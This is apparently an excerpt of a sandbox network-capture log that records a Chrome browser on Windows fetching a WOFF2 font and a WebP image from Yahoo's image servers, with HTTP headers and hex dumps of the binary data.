                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 17qAe7D4rHCPIYMdSreAHsOIcW+X+q+r3Q8DYgL2OC4M1dQtPr23VP8+c8diVhXfSBZfEj3mW7E=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: YZWTBJT5B9KQE81Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 26 Aug 2024 16:29:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Nov 2020 20:20:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "b4df4fce99e5a3c3d1493112a0159071"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 65176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 3027080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 77 4f 46 32 00 01 00 00 00 00 fe 98 00 11 00 00 00 02 5e d8 00 00 fe 2a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 8c 2f 1b 83 ee 0a 1c 92 7a 3f 48 56 41 52 8c 77 06 60 3f 53 54 41 54 1c 00 88 00 2f 64 0a 81 b9 10 81 94 4f 0b 87 36 00 30 83 a1 46 01 36 02 24 03 8e 66 04 20 05 8b 7c 07 99 39 5b b3 47 92 80 b0 09 68 2c 6a 2b 6e e3 d7 6d 44 c0 67 6e a9 56 da f1 b3 17 c2 3c bc d6 63 31 3d c5 8c 9a 32 13 7f 7e b0 06 cf 8d e4 ee 76 c4 5e 8d d7 eb b3 ff ff ff ff 17 25 8b 18 5b 33 87 cd ec dd 01 00 a9 66 81 a2 66 f5 fd 3f c9 61 44 2e b9 a8 a8 b6 e8 a8 87 d1 b5 79 18 0b 54 a6 e8 3b 4f d5 73 7e dd 0f 87 b6 d5 f1 f4 86 72 7e 7b c5 bb 3f c6 f1 b0 74 89 76 85 20 ee 44 e2 4b 5f 1b e4 95 c2 74 56 f3 16 de 37 b8 4a c2 86 e3 2d 32 16 3a 46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: wOF2^*/z?HVARw`?STAT/dO60F6$f |9[Gh,j+nmDgnV<c1=2~v^%[3ff?aD.yT;Os~r~{?tv DK_tV7J-2:F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 1f 66 86 85 fb d2 e9 d3 06 b3 8b 33 38 2b db 92 8b 92 5f 4a 39 f6 eb 3f dc 4e ff da 5b 4a 55 fe 43 c9 17 65 85 59 21 0d f6 2c d6 80 ed 97 fb e5 3b d8 4e b3 22 11 49 a7 f9 33 3d 02 5b 40 4d 2c d9 1d 24 2b 5c 85 37 cf a0 53 0f d3 81 05 ae 63 f8 f7 8a 77 2d c0 38 77 06 ba 2c 4a 08 e9 e1 8b 5d 76 a5 4b ec 12 91 74 e5 0f bb 83 1c 22 12 7c bb 44 82 1c de b2 db 8e 25 76 d9 65 97 88 1c 22 22 76 05 11 f1 0f 91 c3 2e bb 24 88 c8 61 97 e4 56 10 11 09 72 88 1c 22 7e 10 f1 03 e0 ef 75 ea fb 92 02 c0 05 1e c6 4e bd 0e 23 8e 38 d6 32 49 b1 d8 10 60 95 6c 16 16 b6 90 ec 84 37 22 ab e5 0d c1 4e 61 ed a4 4e 4b d2 0a d0 dc 27 10 0d 8b bc 65 b2 c4 a7 a7 e9 ff 7f 9b fe fb 67 ef 7d 0e 0f 6a 46 68 0a 11 77 59 69 8a 34 cd 1b 8f df 4a 97 a2 49 19 fe bf e8 02 04 17 c1 a0 97 eb 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: f38+_J9?N[JUCeY!,;N"I3=[@M,$+\7Scw-8w,J]vKt"|D%ve""v.$aVr"~uN#82I`l7"NaNK'eg}jFhwYi4JIk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: bf df f5 ee bf 5b bf 0d 5f 9e e3 32 a7 22 8f c9 3e f6 f4 a4 ae 9f e0 33 27 5f 9e e3 bf b1 2c 10 26 93 ff 41 67 a1 23 7b ae 29 1c fd 17 a3 7c 39 aa eb 91 0a ce 30 8f 3d 8d 8d 7e 1c 3a 26 94 4d 3c 4d 14 4e de 68 25 75 3d 15 9e 8a 4c 2f 93 01 98 82 9e 1e 05 ed f8 2f 4b d6 1a 7d 9e df c8 15 ce 84 67 22 33 80 19 e8 d9 53 75 dc bb 13 4f 27 46 7f 62 cc f3 af 7a f8 6a 81 fc c6 5c 75 e6 0a e7 47 41 f7 65 ec 98 9d 88 03 70 a0 9d d1 bb a7 ea 24 d9 c2 bb c2 53 a1 b0 c0 68 d0 e8 0b 63 5e 8c 1f 2d 8a 74 21 bc 50 b8 50 c1 10 46 43 18 0f 3d 55 5d 52 56 92 2d bd 2b 3d 95 c2 a5 48 09 50 82 2e 8d be 2a 92 aa 48 2b ca 2a b2 95 77 95 c2 4a 05 23 18 e7 fe f9 89 f2 bb 24 4c 22 04 40 a0 e9 a8 72 39 fe 75 49 d9 92 ec d2 83 9b 68 69 f4 cb d0 71 9a b5 9f 16 09 a4 e6 a7 0a 0d c6 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: [_2">3'_,&Ag#{)|90=~:&M<MNh%u=L//K}g"3SuO'Fbzj\uGAep$Shc^-t!PPFC=U]RV-+=HP.*H+*wJ#$L"@r9uIhiq0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 02 21 b1 34 4c 36 62 59 b4 32 36 16 ab 50 4a c1 08 50 2e fd 6d 41 ae c7 77 3c cf b4 9a 93 b7 4e 31 f9 eb b5 ac 60 a3 96 17 63 bd 95 ed b6 4f 6a fb 05 7a 19 0f 62 94 6b 83 d8 9a 6d d3 d6 ad 82 83 db ff 3d 8e ee 74 50 27 0f 38 aa 87 6f b4 bb c5 de a8 bb 36 8a 5d 0b 2c 3f 65 ef 6d be 7a 83 d9 e5 6f 36 fa c0 09 42 2b cd ea 09 f3 e3 22 ac 7f 7e 68 dc e0 b1 9f 28 bd 36 2c 1e 4f 6a 1e 74 77 36 ff fa 0e 88 45 bb 2e d2 89 7e 77 97 8c 62 c4 7f 07 22 7e 34 2c bf cd 89 ec bf 7f cd 25 9e 6b ad b6 98 f4 c5 2b 82 33 36 5f 9d cf 3f ee 7e e3 41 2b e2 99 1a 5c 7f 5c 12 3f ad 1d 60 c5 d6 86 43 cb 71 52 7e bb 13 21 b0 b3 d2 18 62 d7 e8 c8 e9 d9 3d 75 18 bd cf d1 f4 2e 5c 41 8e a6 23 0d 4c 50 94 a8 28 bf 14 59 dc e9 b1 5f 39 7a 23 16 e4 e8 48 09 99 b3 4c cb 72 5e 40 61 60 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !4L6bY26PJP.mAw<N1`cOjzbkm=tP'8o6],?emzo6B+"~h(6,Ojtw6E.~wb"~4,%k+36_?~A+\\?`CqR~!b=u.\A#LP(Y_9z#HLr^@a`
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: c4 29 74 7c 37 93 7e fd 14 7a 2e 2f e6 d6 f7 81 ff 47 85 65 a4 39 53 fe 27 d1 9f 69 9b 76 48 22 99 94 46 53 17 34 63 37 62 a9 d9 d5 69 4f 7b a2 b7 be 58 3f c8 16 a7 22 ed e7 18 7d 05 90 9f 3c 07 aa 4f 15 9f ba b2 7c fb ff 72 06 25 7a df 73 1e 96 0c 2e 80 de fc ed a2 8d 8c 5c 5a bf 0c 7c 0d 61 2d 9a 35 0e e9 3a 89 75 4f 88 e0 6b 01 21 fa 6b eb a1 f0 63 54 5e f4 5b 0f e7 03 0f 7c 7d ec 81 af 7f 27 57 c3 3b bb 20 3c 0a 61 42 3e ac 8c 09 f4 66 ba b3 c0 97 7c ce b7 8b 2e 80 bd d9 cd 45 a0 74 f1 a5 03 9f 33 5c 05 b3 94 2a 76 5b 81 af d3 4b ef 6a 8d e8 ae 4f e4 48 08 74 52 03 5f 5a c9 55 f5 f9 1b 14 f0 75 81 98 9a 67 97 41 02 44 79 b8 c5 56 0c 93 3e 90 45 f9 b8 a7 cc 51 85 5f ea ec 9b 92 f9 17 bc 95 e1 60 36 2d c7 c7 dd 70 b9 8a 39 6b b8 7c fe 5b fc 44 bf aa 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )t|7~z./Ge9S'ivH"FS4c7biO{X?"}<O|r%zs.\Z|a-5:uOk!kcT^[|}'W; <aB>f|.Et3\*v[KjOHtR_ZUugADyV>EQ_`6-p9k|[D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: ca 94 8a e9 94 f3 20 ae 0a c9 20 c8 0e 0d 79 c9 1e 26 6b db af 0b 92 0e a0 a8 83 1d ed c8 d2 45 27 24 a2 16 ce 32 9c cd 5c 66 44 2d e6 b0 13 33 d9 8f 85 3f 4e 63 44 14 7d f8 cc 70 3b 55 2c 19 a3 fd a9 5b 4e f7 8f ae 5f ad 43 2e 72 43 43 ae 73 53 01 77 b9 a5 0b 1e 73 fb 62 66 9c 1b c6 2a ea 64 82 20 af 94 f0 9e b7 ca 44 25 ef 82 de d3 87 e3 1f 35 e2 2b 56 fb db fe a5 55 96 ff 68 a7 f9 1f bb e4 1e 37 c4 00 a2 84 19 1d 77 a2 d1 50 dc de 79 c3 f1 a2 a8 49 fc b3 28 23 79 fa 0d 2b 76 19 1d b0 12 92 79 2b 17 84 25 46 ad 06 93 6d 02 45 5e bb 85 fb 70 35 fc ad 5b 7f 1f 04 c6 bc 00 07 e1 cd cb f0 19 7a e7 aa 8d e9 e6 35 75 89 d0 c4 35 ee 09 60 63 10 f7 54 29 61 a6 35 0c 19 4a 8c 15 80 f5 d5 50 c3 68 e0 9f 36 ca 37 ca fd f0 a0 19 01 a2 d7 aa 39 0a 77 1a 76 77 0b fc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: y&kE'$2\fD-3?NcD}p;U,[N_C.rCCsSwsbf*d D%5+VUh7wPyI(#y+vy+%FmE^p5[z5u5`cT)a5JPh679wvw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: ea 4d 07 39 67 3d 8e cf 76 48 42 4b 17 15 db f7 16 59 89 67 9c 56 a7 66 da 87 ed 5b 1f 4e 55 23 20 e7 1c ee c4 1b 38 ca a6 62 7e bf 78 c9 15 cb b7 c5 c5 2e 1f b8 5d fa 78 17 50 1d c4 6e ae 67 a6 7e 6a 6d ec f7 60 77 13 40 77 ca e7 6c c7 65 ae 87 c0 bb 1d 5e f8 29 82 b9 fd 53 eb 75 2d 76 69 d9 13 ad 01 b2 73 2f b9 27 20 b6 38 d6 7d 16 22 b6 29 33 6b 9e cc 5e 58 bb db 5b 9c 80 0a 13 49 db 0d 95 de e9 b0 f6 3c b3 db 48 99 b4 58 99 f6 8e 38 f6 0c 0f e1 07 89 49 32 2c 55 75 51 49 a6 26 4b 23 6f a4 20 65 a9 62 77 cb ec 55 60 ba fb 1d 83 74 a4 27 43 80 05 d4 31 28 63 a0 c8 6c 16 d5 ed 34 3b 0d b2 db dd be ee f6 ef b2 26 36 ec ca d3 9d 94 39 ab b7 13 e7 60 b7 9b 53 37 cf ee 65 df 05 56 7b f7 68 c5 40 37 24 d5 6f 5f 82 97 78 37 0c 72 04 06 26 16 92 13 67 2e d8 d5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: M9g=vHBKYgVf[NU# 8b~x.]xPng~jm`w@wle^)Su-vis/' 8}")3k^X[I<HX8I2,UuQI&K#o ebwU`t'C1(cl4;&69`S7eV{h@7$o_x7r&g.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: f6 5a a6 51 16 38 5e 3f a7 d5 08 19 c7 38 6f af e9 33 21 8b 4f 1c 95 d8 8e 7b 43 fd 77 93 f5 db 29 2a 71 da b6 d8 c4 b4 83 d5 f5 2a 9d 6d e5 0c 34 df b2 2a a2 f1 dc aa 8d 6a c6 c7 64 cd 95 36 ce 72 b8 7e c5 26 1b d3 f0 ad a0 e9 46 59 12 2d d0 62 b9 14 78 0d 9a bd 09 ba 0e 2a ee 2d c5 ba e3 61 04 b5 06 dd 5a 37 6a f6 a5 a0 57 51 2b 96 1a 47 37 a6 5e 4b 19 34 9b 26 d3 72 75 fb f4 7a 1c 03 ab 7b 38 ee 74 82 4e 52 e5 e2 2a de eb 60 8c ad 61 ba 39 66 9c 78 88 52 ef b5 89 a0 5e 03 c1 1d 21 b0 7c 91 d6 d3 a1 b3 26 c3 82 15 b0 bb 0c aa 9d ba 18 9b ab cf 5b 00 e7 3c c0 29 71 50 c7 87 ea c3 7d 50 9f c0 af 06 e0 e0 2a c8 7e 87 2a 0d 59 c5 b6 d6 20 90 ce f3 f9 45 91 99 d2 cc 10 39 18 0b 5a 6b a5 71 42 28 9d 02 20 e7 1e 90 f3 d3 4b a4 5d 6b 74 0e dd 36 71 22 88 2b ae
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ZQ8^?8o3!O{Cw)*q*m4*jd6r~&FY-bx*-aZ7jWQ+G7^K4&ruz{8tNR*`a9fxR^!|&[<)qP}P*~*Y E9ZkqB( K]kt6q"+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 3d ce e5 88 64 a4 d2 22 ad da b4 3f 69 51 72 03 5d ec e9 d9 98 23 f7 82 ef b8 68 25 23 41 ee c0 81 ea 61 04 9e 3a 9c 97 28 62 7b 47 7f e7 a5 ca cc 14 25 1b f8 48 b5 c6 c7 52 fc 89 32 cb ba d4 1e 6d 37 ea b8 4d 5a 89 45 d6 28 81 28 f2 73 7b 5d 1b ad 8e bb 15 09 b0 4a 3d ab 16 02 fa 60 1f 3f a8 26 00 03 18 81 33 ca 3c 2f e5 78 75 96 69 0a 92 71 fa b3 6d 3b 71 b6 99 f7 bf 89 d7 d9 79 b9 f2 0c e9 80 c0 10 28 0c 8e 40 4e bb 47 15 f6 f4 d9 9c ba 01 5c f5 a1 6a 3c f3 dc 8b fd 7a f9 99 62 0d e0 fb 5f 6a 6c 9a 34 b3 6c ad aa d2 08 5b 2a 2d 68 d5 a6 bd 76 60 33 05 9d ba d8 d3 53 eb d2 8b 9f 66 5c a4 6f 55 0d 6a e5 43 4b 97 59 fb 81 60 76 69 66 cb d0 5e 9b 13 e6 ca 5d 0f 8a 73 e0 93 2c 04 7b ab 03 99 81 84 52 b3 25 59 0e ad 5a 05 cb 67 5a fa 67 a6 13 48 67 23 d3 08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =d"?iQr]#h%#Aa:(b{G%HR2m7MZE((s{]J=`?&3</xuiqm;qy(@NG\j<zb_jl4l[*-hv`3Sf\oUjCKY`vif^]s,{R%YZgZgHg#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 2a 36 20 47 01 16 7c b5 a2 e0 34 c4 4a 6c 38 03 9d 34 88 33 47 d0 f3 9e 42 cf 8e 9e 73 32 9c a0 2a b9 54 d6 94 92 8d a2 4d cd 36 3a 4d 3b 90 9d 1b cb 6e 64 6f a1 52 3b 66 67 fd 1e aa 93 0e d6 34 f7 5b 10 55 bd 4d 58 58 51 00 da 7b 58 7b fa 10 68 f7 c7 7c 7b 43 75 a9 d0 e3 61 8c a6 c9 b0 29 17 f4 2d 25 be 35 84 6d e3 5c a6 13 1d fc 16 f7 89 8a ba 1c 4d 44 51 8a 59 ad db f6 db f6 9b 7e 0e 5b 41 7e d0 55 b9 b6 6a 08 88 7a 20 d0 45 c2 c3 f2 65 38 15 2e ee 00 44 42 b3 f1 46 99 4e 3e 41 c1 1c 7a c5 24 9b 76 00 fb d1 11 53 5f 6c 07 b9 b5 3d a6 5a 53 95 5c 4d e4 01 98 b6 2e 54 73 f3 a1 bb 9c 36 93 17 13 b5 04 69 e5 81 87 da db e6 b2 2f 36 e2 01 ad 50 b1 d2 82 60 19 a4 3d cf 67 3e d7 fd 04 b8 0b b8 84 0c 17 15 43 82 c8 2f 10 11 2f 11 c2 52 1d 0b 07 61 c3 a5 87 06
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: *6 G|4Jl843GBs2*TM6:M;ndoR;fg4[UMXXQ{X{h|{Cua)-%5m\MDQY~[A~Ujz Ee8.DBFN>Az$vS_l=ZS\M.Ts6i/6P`=g>C//Ra


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    39192.168.2.44980187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC763OUTGET /uu/api/res/1.2/sVHMxKrPePA197woLBKrVg--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/f1738c10-7f1f-11ef-b7bf-d9a760ad838d.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1205INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 89792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="f1738c10-7f1f-11ef-b7bf-d9a760ad838d.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "26eca1cfe3b9db0f05adf00e942f7e79"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 11:34:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 11:41:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=356;cpu=1;start=2024-09-30T11:41:51.865Z;desc=miss,rtt;dur=88,content-info;desc="width=560,height=272,bytes=89792,owidth=2800,oheight=1575,obytes=1969677,ef=(1,13,17,23,30)",cloudinary;dur=752;start=2024-09-30T11:41:51.462Z,cld-id;desc=979f85ceb94134543552e556382191ae
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-request-id: 51c24eed226e4cba3075d643debdbef9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 20346
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_cache: miss
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 51c24eed226e4cba3075d643debdbef9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 52 49 46 46 b8 5e 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 2f 02 00 0f 01 00 49 43 43 50 30 02 00 00 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 cf 00 06 00 03 00 00 00 00 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: RIFF^WEBPVP8X /ICCP00ADBEmntrRGB XYZ acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: ed 83 5e ba 61 8c 89 c6 67 95 7a 7a 72 2d 4b 93 cf 91 e0 0a 71 46 f1 de 5b 54 8e df 01 b7 d9 2b 52 a8 8f 11 bf c9 7b dd 15 2f a7 43 27 2a b9 03 97 e7 a7 92 85 03 1e 14 fb f8 64 81 2d b7 c4 48 42 1e ce 7b 39 1e 60 a1 8e 9d 94 49 b9 9f c5 62 de 96 7c ce 69 fd c9 a1 d0 8d b7 c7 20 23 81 ad af de 69 8c fa 6f 9a 81 d3 da 7c 26 9f b7 d8 b2 35 a4 f8 02 5e 29 56 e5 53 9a b6 3c b7 b4 16 5a 86 c6 01 2f ef 07 89 0d 6d e2 f3 c5 c8 0c 4e 62 27 93 1d 52 82 94 4e 15 14 df 61 88 5d da 90 18 92 a4 f2 21 a2 c9 f3 64 c6 41 61 c7 46 81 7d f1 79 0f 0d 6c 6c ce a5 33 7f 7c 93 17 0c 08 5d 2c 37 45 11 b3 93 30 b4 95 a7 4c 2f fb 79 73 bd d7 a6 1b 1d bf ac 8e 84 51 ae 46 fc b3 6a 04 70 18 cc 48 e8 13 1a 14 58 cb b9 4e f7 6b b8 7d 65 c7 dd 0e b2 a3 74 df 29 33 98 7a 18 a5 b1 d8 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ^agzzr-KqF[T+R{/C'*d-HB{9`Ib|i #io|&5^)VS<Z/mNb'RNa]!dAaF}yll3|],7E0L/ysQFjpHXNk}et)3z!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: ff be f3 7b 4f fd d9 17 e9 cb 53 75 e5 d2 d8 cc 7c b9 a6 c9 f7 2f 25 ec d2 11 d0 40 32 e9 14 8a c7 e5 b6 87 01 4e 0b a3 71 b5 da 52 12 41 39 a1 c7 4b 87 f7 1f a8 bb eb c2 33 dc 6d 4b 42 92 1b bd 55 df b9 6a b7 4e 00 28 f8 4a 65 50 88 dc 1f ef d0 d1 32 c9 c9 80 f4 3e 23 33 23 40 6c 55 9e 8c 85 6b 71 cc 13 e4 21 47 16 a5 6b 11 e4 d5 04 50 7e 04 c4 8b 69 bf 70 fd f3 07 92 53 7f 40 86 90 4d e7 e5 a1 2b fb de 66 69 a2 33 da eb 61 b9 80 3c 54 a5 ce a9 e0 68 6f 9b 1b 8e 0a a8 09 27 a8 b3 b9 2f 56 e9 fe 49 50 49 e3 a2 d8 ce 94 ae df 4e a5 5c 25 d3 1b 7f 54 6b ff 2f 84 45 fb 31 87 86 ed a3 88 ca 7f b7 ac dd 53 fc 98 e6 d4 7a d5 b5 6f 7e d7 49 95 bb 0a 22 d2 da d6 ae f9 5d 2f b0 cd 3d 9e 97 13 12 e7 f8 6b 09 27 f6 23 19 b7 98 b5 cc 5e 33 60 42 fb 80 5b df ed ed 01
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {OSu|/%@2NqRA9K3mKBUjN(JeP2>#3#@lUkq!GkP~ipS@M+fi3a<Tho'/VIPIN\%Tk/E1Szo~I"]/=k'#^3`B[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 61 39 11 d1 bd 06 06 90 ce 1f 07 98 f2 a1 d7 7a 79 08 16 b7 2d 47 ef 0f d2 40 76 e5 f7 87 65 5d 21 14 c8 2c b4 ab 38 44 fc 86 be 48 c0 38 af fe 6f 9a 2d 59 95 ef cd 99 94 32 69 9f b4 5c 87 26 6a 77 4f 35 61 19 2f 9b 3e 7e 1f b3 64 8e c3 76 ed cf d0 15 bb 1a a0 d5 51 ba 0d d8 7a 97 5b 34 31 5a c7 5b d6 5b db 8f f7 e5 0a a3 2a d9 20 82 6b 62 3c 61 57 dd cf 2e 76 64 95 41 25 84 54 ab 21 fa 3f 37 fd 3c 7d a9 9e 39 8f 7c 63 15 42 a5 96 03 db 7e 0e b9 45 4c fb b7 38 28 e8 f5 f2 e3 31 62 5c 9a d2 0a 27 a3 08 ef b9 5f 64 e2 d1 d2 9d ba 59 79 35 68 8d d1 07 b0 64 62 60 c6 00 a5 84 14 e4 de 52 7f 4c a4 5c c0 f9 03 10 25 dc c9 0b 87 df 80 3b 2e bd 57 5a a7 07 26 40 d4 0a 3b 32 16 df 1b be 90 42 87 72 66 d9 dc 45 f9 b5 b4 2a 70 03 ec 5f 51 a1 74 cc e5 88 73 ff 82 b8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: a9zy-G@ve]!,8DH8o-Y2i\&jwO5a/>~dvQz[41Z[[* kb<aW.vdA%T!?7<}9|cB~EL8(1b\'_dYy5hdb`RL\%;.WZ&@;2BrfE*p_Qts
